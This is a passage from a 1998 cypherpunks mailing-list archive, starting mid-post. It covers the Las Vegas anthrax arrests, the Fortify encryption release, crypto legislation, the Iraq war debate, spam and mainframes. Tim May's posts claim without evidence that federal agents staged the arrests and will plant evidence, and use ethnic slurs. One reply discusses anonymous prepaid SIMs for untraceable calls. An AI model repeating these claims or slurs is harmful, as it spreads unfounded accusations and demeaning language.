support from Nellis AFB, the U.S. Army, a team from Quantico, and half a
dozen other police and military agencies?

And the Army's involvement (Army and Air Force personnel) would seem to
violate Posse Comitatus (the law forbidding military involvement in
domestic police enforcement).

Still looks like a canned event to drum up support for Operation Wag the Dog.

(Consider that one of the arrestees was charged two years ago with some
crime related to having precursor chemicals which could be used in making
bubonic plague. He was on probabation, and probably his movements were
being tracked. Perfect for "rounding up the usual suspects.")

So far the seized materials are "unidentified." It'll be real funny, and
tragic, if nothing is found.

(Ah, a reporter just asked, "You've had these suspects under surveillance
for quite some time....")

But I suspect the Feds will _plant_ something incriminating even if nothing
is actually found. Like throwdown guns planted on perps in shootings,
throwdown vials will be used. (Dugway Proving Grounds was involved, and is
just one of many sources of anthrax.)

It's truly indicative of our Orwellian state that the USG is ranting about
"weapons of mass destruction" when the USG maintains massive chemical,
biological, and nuclear stockpiles.

(Or are Fort Detrick and Dugway  and the VX stockpiles near Hanford just
"baby milk factories"? :-) )

Wanna bet they also bring crypto in this media circus?


--Tim May


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fbm@jolt.mpx.com.au (Farrell McKay)
Date: Thu, 19 Feb 1998 09:02:53 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE: Fortify-1.2.1: worldwide, 128-bit S/MIME and SSL encryption
Message-ID: <m0y5KCK-000367C@jolt.mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain




Sydney, Australia. (19 Oct, 1997).  Fortify for Netscape, version 1.2.1,
with support for strong S/MIME, has now been released.

Fortify for Netscape is a system that provides world-wide, unconditional,
full strength, 128-bit encryption to users of Netscape's Web browsers.
If you routinely use Netscape's export grade Web browsers (i.e. the ones
that are available on the net), then you need Fortify. 

This new version supports two significant improvements to the strong crypto
in the 4.x Netscape web browsers - namely long RSA keys (1024-bits) for key
generation, and strong S/MIME encryption for your e-mail messages.
These improvements are in addition to the 128-bit SSL services already
provided by Fortify.

Version 1.2.1 is available on Windows 95 and NT immediately.  The Unix versions
are being finalized, and these will be released over the coming few days.

Fortify costs nothing to download and use. Nil. Zippo. Zilch.  It currently
supports most, if not all, of the non-beta versions of Netscape Navigator
(3.0x) and Communicator (4.0x), that have been released on the following
platforms:-

	Alpha DEC-OSF
	Mips SGI-Irix 5.x and 6.x 
	Sparc Sun-Solaris 2.x 
	Sparc Sun-SunOS 4.1.3_U1 
	x86 BSD, FreeBSD and BSDI
	x86 Linux-Elf 
	x86 Microsoft Win95 and WinNT 

Full details about availability, copyright, download sites, latest news,
and an FAQ guide can all be found at the Fortify web site:-
	http://www.fortify.net/

Farrell McKay
-- 
Farrell McKay                Email: Farrell.McKay@mpx.com.au   (PGP key avail)
Wayfarer Systems Pty Ltd     http://www.fortify.net/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 04:09:53 +0800
To: Eric Cordian <cypherpunks@cyberpass.net
Subject: Re: PLO censoring pro-Iraqi sentiments
In-Reply-To: <v03102801b112264ccf41@[207.167.93.63]>
Message-ID: <v03102804b1123f22a53c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:03 AM -0800 2/19/98, Eric Cordian wrote:
>Tim May writes:
>
>> The PLO ("Palestinian Authority") has banned pro-Iraqi demonstrations and
>> has seized the offices of newspapers and radio stations with an editorial
>> bent against the upcoming War with Saddam.
>
>Under US pressure, of course.  In Bosnia, the US, hiding behind the UN, is
>attacking media outlets critical of its occupation, and even writing
>"confessions" for the anchors to read on the air.

And don't forget Somalia. In Somalia the U.S. occupying forces not only
suppressed newspapers critical of the U.S., they also led the disarmament
of the civilian population.

(This was verified, and I saw CNN reports of journalists following the U.S.
teams going farm to farm, hut to hut, collecting the AKs and SKS rifles the
peasants had. There were then, predictably, reports that the peasants were
now finding themselves easy pickings for roving looters. The U.S. clucked
and called these looters "agents of Warlord Aidid." Whatever, the effects
of disarming people are predictable. Apparently the First and Second and
Fourth Amendments are good enough for us, even if honored less and less,
but not OK for ragheads and dirtballs.)

This is why I cheered to see the U.S. gets its tail kicked in Somalia and
have to retreat in disgrace. Alas, the U.S. planners just looked for
another war, one we could "win," and they found a bombed out Bosnia to be
the perfect place to "restore our dignity."

Amerika the Fascist.

--Tim May





>So much for free speech. A good example of what the American people can
>expect from their government should FUD no longer suffice to control their
>thought patterns.
>
>--
>Eric Michael Cordian 0+
>O:.T:.O:. Mathematical Munitions Division
>"Do What Thou Wilt Shall Be The Whole Of The Law"


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Thu, 19 Feb 1998 09:26:05 +0800
To: "'Nightmare'" <jkwilli2@unity.ncsu.edu
Subject: RE: bugged?
Message-ID: <ED111D55D096D111A1990000F8794AF506E163@itfexch3.isd.tafensw.EDU.AU>
MIME-Version: 1.0
Content-Type: text/plain



> Hi,
> 
> Although the phone number will not be traceable to you. The system
> knows your phones IMEI number, which is hardware/firmware bound
> to GSM digital phones. They can put 2 and 2 together and find that
> the IMEI number usually corresponds to your number.
> Unless you can reprogram the IMEI, I wouldn't trust a pre paid card.
> I think the IMEI number is also used as part of the encryption key.
> 
> >or buying the optus card package, aus only, for about $70-00, which
> gives
> >you a simm card and sixty dollars worth of calls.. phone is not
> supplied.
> >
> >hurry though, as the feds want these cards to be name registered, as
> they >can 
> >presently be bought with no ID.. great for those untraceable
> dealings...
> >
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Fri, 20 Feb 1998 02:31:30 +0800
To: cypherpunks@cyberpass.net
Subject: FBI Claims Germ Attack Foiled
Message-ID: <199802191818.MAA00341@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Here's an interesting little story that just floated by on AP.
 
-----
 
NEW YORK (AP) -- Two members of the Aryan Nation have been arrested in
Nevada and accused of plotting a bacterial attack on the New York City
subways, an FBI source said today.
 
The source, who spoke in New York on condition of anonymity, provided
no other details. The Aryan Nation is a white supremacist group.
 
The FBI in Nevada said that two men were taken into custody in a
luxury car outside a doctor's office in Henderson, Nev., near Las
Vegas.
 
FBI spokesman Aurelio Flores in Las Vegas said only the matter was
``serious.'' He said different teams from around the country are
``coming in to look at what we have.''
 
A news conference was set for late morning Las Vegas time.
 
Flores said the FBI has secured the area where the car was found and
had ``made everything safe.'' He said the agency was not looking for
explosives.
 
The New York source said the suspects allegedly planned to release a
``dangerous bacterial substance'' in the subways.
 
In Washington, a federal law enforcement source said agents were
investigating allegations that the two men arrested in Las Vegas
possessed anthrax. The source stressed that the tests were not
complete and that there have been unfounded instances in the past
involving allegations of anthrax.
 
Anthrax is an infectious disease that usually afflicts only animals,
especially cattle and sheep. But Anthrax spores can be produced in a
dry form suitable for weapons and can be fatal to humans even in
microscopic amounts.
 
New York City Mayor Rudolph Giuliani was briefed on the case by FBI
Director Louis Freeh and was told ``there is no reason for alarm,''
said mayoral spokeswoman Cristyne Lategano. She would not confirm what
the alleged threat was.
 
Giuliani, speaking generally about the threat of terrorism, said:
``Every part of America, every part of the world, is vulnerable to
terrorism. ... There is no way to make an open society, a democracy,
invulnerable to terrorism or to criminal acts. Short of closing down
America and closing down the city of New York, it would be impossible
to do that.''
 
The mayor added, ``It is impossible to have a police officer every
place. That would be unrealistic, and it would change the nature of a
free society. Short of that, I think New York City is doing everything
it can do to try to reduce the risk.''

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 04:31:10 +0800
To: cypherpunks@Algebra.COM
Subject: No Real Debate Yet on the War
Message-ID: <v03102806b112432696c3@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




By the way, for those of you not living in the U.S., and who haven't been
here to see the way the debate (or lack of it) has been developing in the
U.S., let me make a few points:

* the preparations for a new war have been going on for several weeks

* Congress has taken no votes one way or the other about this imminent war

* Congress, in fact, is not in session, and has not been called back into
session to debate and discuss and ultimately vote on a Declaration of War
(or what passes for it these days, a "vote of moral support")

* the American public has shown a lukewarm response at best to the plans,
such as they understand them

* speaking of plans, the plans are very vague. The public does not know
what the goals of a war might be, what the endgame options are, how many
Americans are likely to die, what the likely counterpunch will be (hint:
think terrorist attacks), and just how the U.S. plans to fight a war
without clear goals and clear support.

* essentially no one thinks a bombing campaign will either kill Saddam, who
moves around a lot to highly secret locations (including houses of
peasants), or will destroy all of those small cannisters of anthrax and
sarin and the like...when asked, Albright and Cohen are vague and
dissembling.

* meanwhile, scare reports of terrorists in Las Vegas are making the
headlines...a perfect "give us some jimbells to scare the nation" scenario.
(With the usual scary stuff about his "survivalist" books, his membership
in Christian Identity, and his links to Aryan Nation. Throw him jail!)

In short, where is the debate about this upcoming war?

Is Congress now so ineffectual that its main power, the power to declare
war, is no longer "operative"?

Amazing.

--Tim May, posting before his own home gets raided for having supplied PGP
to Christian Identity and Aryan Nation.


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 20 Feb 1998 04:46:09 +0800
To: cypherpunks@cyberpass.net
Subject: Congress getting involved in crypto this year
Message-ID: <Pine.GSO.3.95.980219122124.9768B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm in the CFP computer room listening to CDT's Alan Davidson finish his
comments on a panel discussion about crypto: "Congress is getting involved
in the crypto debate. Bad things may happen, good things may happen. It
depends on all of you."

Anyone want to bet on the possibility of Congress doing a "good thing" on
crypto? Remember, there's no bill being considered in either house of the
Congress that does *not* have domestic controls on encryption: the
crypto-in-a-crime penalties.

Now Jason Mahler, from the Office of Congresswoman Zoe Lofgren (D-Calif),
is speaking. He stressed that the House Commerce committee "resoundingly"
voted down the FBI's bill last September -- but neglected to say that the
panel approved included a *doubling* of crypto-in-a-crime penalties. He
says Lofgren's plans are to push crypto legislation this year: "Hopefully
if we get it [passed] in the House in the spring we'll move to the
Senate." What about a presidential veto? "We're going to put pressure on
the administration."

Now Mahler is talking about how much support the SAFE bill has in the
House (yes, the version of SAFE with crypto-in-a-crime penalties) and how
it's a good thing. True, a majority of members of the House were at one
point cosponsors. But this is a misguided way to look at the situation.
Some of these "cosponsors" and "crypto supporters" voted for the FBI's
bill. Others, like the late Sonny Bono, ended up speaking out against it. 
Lobbyists are about to find out that the support for crypto freedom in the
Congress is wide but very, very shallow. 

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 04:47:37 +0800
To: sunder <sunder@brainlink.com>
Subject: Re: Is spam really a problem?
In-Reply-To: <199802181733.SAA26244@basement.replay.com>
Message-ID: <v03102807b112485dd04f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




Ray has widened his definition of "spam" even more.

At 12:22 PM -0800 2/19/98, sunder wrote:
>Tim May wrote:
>>
>> But *many* things eat up our valuable time. Doesn't mean government action
>> is the answer.
>
>Show me one place in the email you replied to where I mention that I would
>favor
>any sort of governmental action in terms of passing anti-spam laws.  I did
>mention
>contracts between ISP's and subscribers at one point, but did you see anything
>about someone passing laws?

You've mentioned that spam is theft. If the courts agree with you on your
definition of what spam is, then pretty clearly the legal system gets
invoked. (But to forestall any confusions in the courts, the anti-spam
sentiment being discussed by Ray and many others is likely to lead to
specific legislation. Sadly.)


>> If you use ISDN and pay minute charges to download an article from me, for
>> example, and you feel it was a waste of your valuable time, should my
>> article be illegal?
>
>If I am forced to pay for something that I don't want to buy, it is a theft
>of my money.  If you send me garbage without my asking for it, then you're

"Theft." Call the cops.

>But there are those who see the upside down pentagram and send me email
>stating I'm in the wrong religion.  Thems I consider spam because they
>try to pursuade me to their belief system.

So, your definition of spam has now been expanded to include someone who
sends _you_ (you, not thousands, not tens of thousands) a message you don't
care for.

Well, not much more I can say here.

--Tim May


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D'jinnie" <jinn@inetnebr.com>
Date: Fri, 20 Feb 1998 02:59:42 +0800
To: Cypherpunks Mailing List <cypherpunks@cyberpass.net>
Subject: Mainframe solution (fwd)
Message-ID: <Pine.GSO.3.95.980219124520.15835A-100000@falcon>
MIME-Version: 1.0
Content-Type: text/plain



I do not know where this was published but it seems interesting...

---
Reality leaves a lot to the imagination.

jinn@inetnebr.com

---------- Forwarded message ----------
Date: Thu, 19 Feb 1998 13:13:20 -0500
From: "Labry, Phillip" <Phillip.Labry@CWI.CABLEW.COM>
To: intp@jubjub.wizard.com
Subject: Mainframe solution,Lengthy but interesting...
Resent-Date: Thu, 19 Feb 1998 10:14:27 -0800 (PST)
Resent-From: intp@jubjub.wizard.com


> Got this interesting article from an old friend of mine.........the
> best approach seems to be to build GUI-based applications on the
> front-end and use mainframes as big servers.
> 
> 
> ---------------------------------------------------------------
> 
> By Martin J. Garvey
> 
>         The mainframe, once the IT backbone for many enterprises, is
> regaining that stature. Next month, several large companies will lead
> the charge back to big iron in an attempt to rescue unwieldy or
> stalled client-server projects. Mainframes, these companies say,
> provide better price/performance and return on investment than their
> sleeker Unix and Windows NT systems, while delivering proven security,
> scalability, and reliable centralized management.
> 
>         GTE Data Services, Motorola Semiconductor, University Health
> System, and others are at the cusp of a trend toward leveraging the
> mainframe to back out of costly or unmanageable Unix and Windows NT
> client-server implementations. Brian Jeffery, an analyst with
> International Technology Group, an IT consulting firm in Los Altos,
> Calif., says about 70 sites worldwide are porting Unix or NT
> applications back to IBM OS/390-based mainframes. By fall, he
> estimates, as many as 300 sites will convert Oracle, SAP, and
> PeopleSoft projects to OS/390. "By 1998, there will be thousands of
> these accounts," predicts Jeffery.
> 
>     "It's a brand new life for the mainframe," says Cal Braunstein, a
> consultant with Robert Frances Group, an IT market research firm in
> Westport, Conn. "It's far less expensive to tie Unix and client-server
> information into mainframes than it is to spread it out across much
> smaller systems."
> 
>     University Health System, a 450-bed hospital in San Antonio, hopes
> to begin in August to move data-intensive applications, such as
> patient accounting and discharge, to the IBM Parallel Sysplex
> mainframe.  The project is expected to be completed by year's end. "We
> can't go in a direction of more and more resources for a nonending
> distributed environment," says Tim Geryk, director of technical
> services for University Health. "We need to turn it back the other way
> for a better scale of economy."
> 
>         Currently, University Health's enterprise has 2,500 desktops
> attached to LANs, 100 RS/6000 Unix servers, about 600 other Unix
> machines, 2,000 dumb terminals, an IBM ES/ 9000 bipolar mainframe, and
> an IBM 9672 CMOS mainframe. "It's time-intensive to keep so many
> workstations and servers up and running when so many different things
> can go wrong," says Geryk. "We can't put our hands around it anymore."
> 
>     The company is installing an IBM Parallel Sysplex architecture
> that supports Unix applications to provide a single-platform image
> across its enterprise. Bill Tudor, director of systems product
> management for mainframe maker Hitachi Data Systems in Santa Clara,
> Calif., says it's not uncommon to see multiple racks with 200 Unix
> servers in the data center. "It's just cheaper to run that same
> information on the mainframe," he says.
> 
>         According to Jeffery of ITG, it's cheaper and easier to
> increase network bandwidth for integration between Unix servers and
> the mainframe than it is to add more Unix servers. Also, customers are
> demanding that systems management, as well as enterprise data itself,
> be centralized.
> 
>         And according to the Clipper Group, a consultancy in
> Wellesley, Mass., Unix's security hasn't caught up to the mainframe's.
> Some intrepid IT users aren't just migrating some applications to
> mainframes. They're also consolidating client-server architectures
> onto big iron. One financial services company reportedly is
> consolidating as many as 600 Unix servers onto one mainframe, sources
> say.
> 
>         The hidden costs of Unix servers may be the final incentive to
> push many customers back to the mainframe. For example, CMOS
> mainframes may cost three times more than Unix servers, but management
> costs for distributed Unix servers are 20 times greater than those for
> supporting a mainframe, according to Giga Information Group in
> Cambridge, Mass.
> 
>         IT managers can port Unix applications to the OS/390 mainframe
> operating system for acceptable performance in a production
> environment. Moreover, enterprise applications, including those from
> Oracle, PeopleSoft, and SAP, are available on OS/390. And the CMOS
> processor architecture, the heart of IBM's Parallel Sysplex mainframe
> cluster that scales to 32 processors, is for the first time as
> powerful as older bipolar mainframes.
> 
>         Motorola's $7.9 billion semiconductor business unit in Phoenix
> will begin moving all of its SAP R/3 data to the mainframe in the next
> four months.
> 
>         Its architecture will then include PC clients, Unix servers as
> application servers, and an IBM OS/390-based Parallel Sysplex
> mainframe as host for about 500 Gbytes of data. The company says it is
> one of five pilot sites for SAP's R/3 on the mainframe. Before taking
> on the pilot, the semiconductor manufacturer evaluated multiple Unix
> servers and databases. The Unix systems lost to the mainframe because
> they lacked the power and manageability Motorola was looking for. "It
> was the best way to keep the database in one place," says Patrick
> Horrigan, corporate VP and IS director for Motorola's SPS division.
> "And it's 40% cheaper than the Unix solutions."
> 
>     'Tons Of Unix'
>         At GTE Data Services in Temple Terrace, Fla., shifting its
> distributed applications to the mainframe conforms to the division's
> motto of "right data, right device." The group is consolidating six
> systems into three or four. "With our so-called distributed systems,we
> have tons of Unix out there, but it's really not even distributed,"
> says operations director Pat Remick. "We're just piling a lot of Unix
> boxes on raised floors next to the mainframes, so we decided to look
> at the better reliability and scalability of the mainframe."
> 
>         Analysts point out that server consolidation isn't relegated
> solely to mainframes. HP and Sun Microsystems recently both announced
> enterprise-class servers that many say will suffice as Unix
> consolidation servers. "There is increasing value in consolidating
> Unix servers and PC servers separate from mainframes," says John
> Young, VP of enterprise systems planning for the Clipper Group.
> "People are realizing the savings behind the re-emergence of the data
> center. It's the place for consolidating processing, management,
> accountability, and data storage."
> 
>         The pioneers in the migration back to mainframes say they
> aren't ready to dismiss Unix. "Our client and application server tiers
> of R/3 will remain distributed with Unix," says Motorola SPS's
> Horrigan.  However, distributed computing could benefit from greater
> reliability, availability, and scalability. "Downtime from distributed
> systems costs too much in management, and I know a lot of processing
> is on Unix," says GTE's Remick. "But some transition must happen.
> Something has to be done."
> 
> 
> 
>     SIDEBAR:Reasons For Returning
> *   Mainframe security is at least two years ahead of Unix or Windows
> NT
> *   OS/390 can run Unix, NT, and enterprise applications such as SAP
> R/3
> *   Mainframes have the capacity to store a database of 500 Gbytes or
> more without splitting it up
> *   Parallel Sysplex configurations have no single point of failure
> and are easy to update and maintain while the system is running
> 
> 						    Data:
> InformationWeek
> 
> 
> 
> --
> 
> 
> 
> 
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 20 Feb 1998 02:44:37 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Opticom.com is *not* the Opticom that makes the TB chips...
Message-ID: <199802191847.MAA17888@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

Someone mentioned in private mail that 'opticom.com' was a valid webpage.

True, but it isn't the Opticom that is making the tera-byte chips that we
have been discussing. I did a whois on them and called the admin contact
number and they very quickly made it clear there was no connection.

So, if anyone knows how to get in touch with the company on the other side
of the big pond please pass that info along to me. I am most interested in
getting data sheets, etc. on the devices.

Thanks.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 20 Feb 1998 05:08:03 +0800
To: cypherpunks@cyberpass.net
Subject: SF Chronicle on Sen. Dianne Feinstein: "Feinstein Offline"
Message-ID: <Pine.GSO.3.95.980219125257.9768F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Thu, 19 Feb 1998 12:52:39 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: SF Chronicle on Sen. Dianne Feinstein: "Feinstein Offline"


****

Feinstein Offline
Her law-and-order stance irks tech industry 
Jon Swartz, Chronicle Staff Writer
Thursday, February 19, 1998 

URL:

http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1998/02/19/BU48718.DTL

Despite Silicon Valley's growing economic and political clout, a chorus
of high-tech executives have complained that U.S. Senator Dianne
Feinstein is unresponsive and, at times, hostile to their interests --
especially when it comes to the Internet. 

``She is in the forefront of senators voting against the Internet,''
said Jerry Berman, executive director of the liberal Center for
Democracy and Technology in Washington, D.C. ``On a scale of 1 to 10, in
terms of being on the side of Internet freedom, she gets a 1.'' 

Feinstein voted in favor of bills banning the distribution of
bomb-making instructions, pornography and personal information over the
Internet. She wants to impose fines and jail terms for people who gamble
online. She supports strict export controls on encrypted software. And
she has joined the move to ban laptop computers on the Senate floor. 

``Isn't it ironic that the senator from California and the former mayor
of San Francisco appears to be running against the Internet?'' said
Stanton McCandlish, program director at The Electronic Frontier
Foundation, a civil libertarian organization in San Francisco. 

David Sobel, legal counsel at the nonpartisan Electronic Privacy
Information Center in Washington, D.C., said Feinstein is ``perceived to
be less supportive of the Internet and the computer industry than one
would expect.'' 

Feinstein -- a rumored vice presidential candidate in 2000 -- dismisses
the criticism as ``nonsense'' and says her record is ``replete'' with
technology-friendly legisla tion in securities litigation reform, R&D
tax credits and education. 

In September 1996, Feinstein was one of the few Democrats to override
President Clinton's veto of the securities-litigation reform legislation
that the high-tech industry desperately wanted. She also pushed hard for
the permanent extension of R&D tax credits in both the Taxpayer Relief
Act of 1997 and the 1996 Small Business Job Protection Act. Both bills
were passed into law. 

But Feinstein's strong law enforcement stance works ``to the detriment''
of the Internet, Sobel said. ``She accepts, without question, law
enforcement's claims about the dangers of the Internet.'' 

In Feinstein's view, ``This whole cyberspace is moving so fast that one
has to be sure that kids are protected,'' she said. ``I'm concerned when
kids blow themselves up by building bombs (they learned to make) over
the Internet, when Social Security card numbers are made available
online and when pedophiles punch up children's names. There is a
philosophy that anything goes. 

``I recognize the primacy of the First Amendment,'' she added. ``But
privacy goes two ways. I think prudent laws to protect children may well
be necessary. There should be a balance.'' 

Feinstein's most controversial stand is on encryption, the technology
that allows digital information to be scrambled and sent securely over
the Internet. Strong encryption is used within the United States to
protect the transmission of credit-card numbers, trade secrets and other
confidential information. 

But national security laws stretching back to the Cold War prohibit the
export of software with strong encryption. Law enforcement officials
want to be able to crack the code in case it's used by terrorists, drug
traffickers, economic saboteurs or others plotting against the United
States. 

High-tech companies say they want to be able to export software with
strong encryption because they're losing billions of dollars in
potential sales to foreign competitors who aren't subject to the same
restrictions. 

A bill called the Security and Freedom Through Encryption (SAFE) Act,
co-sponsored by Representative Anna Eshoo, D-Atherton, would relax
export controls. 

But a rival bill co-written by Senators John McCain, R-Ariz., and Bob
Kerry, D- Neb., titled the Secure Public Network Act would go the other
way and impose controls on use of encrypted software domestically. 

Feinstein favors the latter bill but doesn't think it goes far enough.
She thinks anyone who uses encrypted software should make a key to
unlock their code available to law enforcement authorities. 

During a Senate Judiciary Committee hearing on encrypted software last
fall, Feinstein said that nothing short of mandatory domestic control of
encrypted software would be acceptable. She added that no high-tech CEO
had contacted her about the issue. 

Feinstein's comments caused a furor. A January 15 letter from 26
high-tech executives sent exclusively to Feinstein stated: 

``We were disappointed by your comments. . .implying that California
companies are ambivalent regarding your position on encryption policy. 

``California companies and industries nationwide are united in
opposition to domestic and export controls,'' the letter stated. It
closed with the names of chief executives from Netscape Communications,
America Online, Pacific Bell, 3Com, Sun Microsystems, Autodesk, Adobe
Systems, RSA Data Security and others. 

``I was nothing short of shocked,'' said RSA Data Security CEO Jim
Bidzos. ``For someone to take such an extreme position on such an
important issue without touching base with her constituency is
unbelievable.'' 

Explaining her position in an interview, Feinstein said, ``When a
particular situation involves public safety, there should be some means
for recovery of encrypted information by law enforcement that falls
within the strict confines of due process of law. 

``If industry can come up with a way to provide the same law enforcement
access without a mandatory key-recovery system, I would support it,''
she said. 

[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 20 Feb 1998 05:16:38 +0800
To: cypherpunks@cyberpass.net
Subject: TechNet on Feinstein, SF Chron article, and encryption
Message-ID: <Pine.GSO.3.95.980219125825.9768K-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Thu, 19 Feb 1998 12:58:17 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: TechNet on Feinstein, SF Chron article, and encryption

This in response to these comments in the SF Chron article, sent in a
sep. message:

>Wade Randlett, a Democratic Leadership Council activist who advises
>TechNet, said Feinstein's ``detractors are narrow- minded and hung up on
>her stance on encryption. If you look at any broad sweep, she is as big a
>champion for Silicon Valley as anyone in the U.S. Senate.''

-Declan

---------- Forwarded message ----------
Date: Thu, 19 Feb 1998 12:43:14 -0800
From: "Garrett, Sean" <sgarrett@alexander-pr.com>
To: "'declan@well.com'" <declan@well.com>
Subject: Feinstein & Internet Policy

Declan:

Below is the awaited article about Senator Feinstein and Internet
policy.

I also want to make sure that TechNet's position on the encryption
debate is clear.  While encryption regulations are not the only major
issue facing the industry, we recognize that they are extremely
important to many (including most of TechNet's members). 

While TechNet as an organization is not playing a role in the debate, we
believe the dialogue that we facilitate between tech CEOs and public
officials will help further all of our collective goals-including the
industry's domestic and export crypto goals.

Regarding Senator Feinstein, we hope that future meetings between her
and the industry are productive on encryption and other important
issues.

We do wholeheartedly appreciate the Senator's leadership with education
and securities litigation reform-TechNet's two policy goals.

Best,
Sean Garrett
Alexander Communications (representing the Technology Network)
Sgarrett@alexandercom.com









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jim.burnes@ssds.com>
Date: Fri, 20 Feb 1998 04:07:12 +0800
To: Tim May <tcmay@got.net>
Subject: Re: PLO censoring pro-Iraqi sentiments
In-Reply-To: <v03102801b112264ccf41@[207.167.93.63]>
Message-ID: <34EC8F2A.7DECFD4B@ssds.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
> No doubt Madelyn Albright, William Cohen, and Sandy Berger would love to
> have had such press controls yesterday in Columbus, Ohio, when their
> policies were booed and heckled, and when the questions asked were the
> common sense questions many of us are asking.....
> 

Art Bell's radio show had a very interesting interview with a
correspondent who was at the "town hall meeting".  As bad as the
footage from Nightline (donated by CNN) looked, most people
don't know what CNN didn't show.

The damage control geeks at the white house are trying to get
you to believe it was just a vocal minority.  Well apparently
the minority was somewhere between 20 and 50 people.  A pretty
healthy minority.  Healthy enough that, during the break, a riot
almost broke out.  (The whole audience clapped when the 
non-minorities questioners threw some very hardball questions)

What I found interesting was the late night ABC news spin.  They
said a vocal minority had behave rudely, then went on to mention
that a veteran was in favor of doing whatever it took.  What the
veteran really said was something like, "we shouldn't be over there
unless we do it right and take over." (he was pretty angry too)

Then more interesting propaganda during Nightline when Koeppel
asked Albright et al why we should bomb Iraq for "having weapons
of mass destruction" when we never bombed Russia during the
cold war.  The secretary of defense lied through his teeth
(or is totally ignorant - a possibility) when he said that
none of those countries has ever used its weapons of mass
destruction.  I guess he forgot about the Soviets and their
yellow rain campaign in Afganistan.

Maybe what he meant to say was they never used it on us.
Niether have the Koreans.  Niether have the Israelis.
(what weapons of mass destruction did Iraq use on us?
I thought it was the other way around.  I'm trying to
remember where I read the report, but I think the US
used Fuel Air Explosives in the PGWar)

Wag the Dog....

jim burnes





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Fri, 20 Feb 1998 03:11:55 +0800
To: cypherpunks@cyberpass.net
Subject: Re: PLO censoring pro-Iraqi sentiments
In-Reply-To: <v03102801b112264ccf41@[207.167.93.63]>
Message-ID: <199802191903.NAA00453@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May writes:

> The PLO ("Palestinian Authority") has banned pro-Iraqi demonstrations and
> has seized the offices of newspapers and radio stations with an editorial
> bent against the upcoming War with Saddam.

Under US pressure, of course.  In Bosnia, the US, hiding behind the UN, is
attacking media outlets critical of its occupation, and even writing
"confessions" for the anchors to read on the air.

So much for free speech. A good example of what the American people can
